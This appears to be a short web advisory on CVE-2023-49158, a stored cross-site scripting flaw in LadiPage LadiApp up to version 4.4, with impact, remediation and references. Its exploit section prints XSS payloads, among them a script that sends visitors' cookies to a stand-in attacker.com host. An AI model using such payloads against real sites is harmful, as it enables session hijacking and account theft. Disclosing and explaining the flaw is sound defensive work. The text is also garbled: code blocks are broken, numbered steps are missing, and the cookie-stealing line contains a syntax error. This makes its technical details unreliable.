CVE-2023-49158 - Stored XSS in LadiPage LadiApp (<= 4.4) – What You Need To Know

If you use the LadiPage LadiApp (up to version 4.4), your website could be at risk. Recently, a new critical vulnerability was discovered: CVE-2023-49158 – Improper Neutralization of Input During Web Page Generation, better known as a *Stored Cross-site Scripting* (Stored XSS) flaw.

Below, we’ll break down what this means in simple terms, show an example, explain how hackers exploit this bug, and give you references and fixes.

What is CVE-2023-49158?

This is a “Stored XSS” vulnerability. That means an attacker can put malicious code into your LadiApp instance, and every time someone visits the affected page, their browser will run that bad code. This could allow hackers to steal cookies, session data, or even take control of your account.

CVE ID: CVE-2023-49158
Software: LadiPage LadiApp
Versions Affected: Up to (and including) 4.4
Type: Stored Cross-site Scripting (XSS)

How Does This Vulnerability Work?

LadiApp lets you build website landing pages easily. The app stores content users enter and displays it later on web pages. However, in affected versions, the app does not properly “sanitize” or “escape” user input – that is, it doesn’t remove scripts or code that could be dangerous.

So, if a user adds a script in a text field, it will be saved to the database and displayed when others visit. This is what happens in a stored XSS attack.

Exploit Details

Let’s look at a simple example of how an attacker could exploit CVE-2023-49158.

`html

The code gets stored in LadiApp’s database.

3. Now, every visitor who loads the affected page will see a pop-up (or worse – the attacker could steal session tokens):

`javascript

// More malicious code possible, like sending cookies to a remote server

Here is a typical script for demonstration

<script>
  alert('Hacked via XSS!');
</script>

Or, stealing cookies

<script>
  new Image().src='https://attacker.com/steal?cookie='; + document.cookie;
</script>

To reproduce the exploit

- Log in as a normal user or someone with access to add/edit content.

Impact

- Steal User Sessions: Hackers steal cookies/session tokens.

Remediation & Fixes

Official Patch: Check LadiPage’s update/patch notices or contact their support for a fixed version after 4.4.

References

- CVE entry: CVE-2023-49158
- OWASP: Cross-site Scripting (XSS)
- LadiPage Home

Conclusion

CVE-2023-49158 is a serious bug in LadiPage LadiApp up to 4.4. Attackers can use it to inject persistent JavaScript into your website – risking your users, your data, and your brand.

If you use LadiApp, upgrade immediately to the latest version, and review all user-generated content for suspicious code.

Timeline

Published on: 12/09/2024 13:15:34 UTC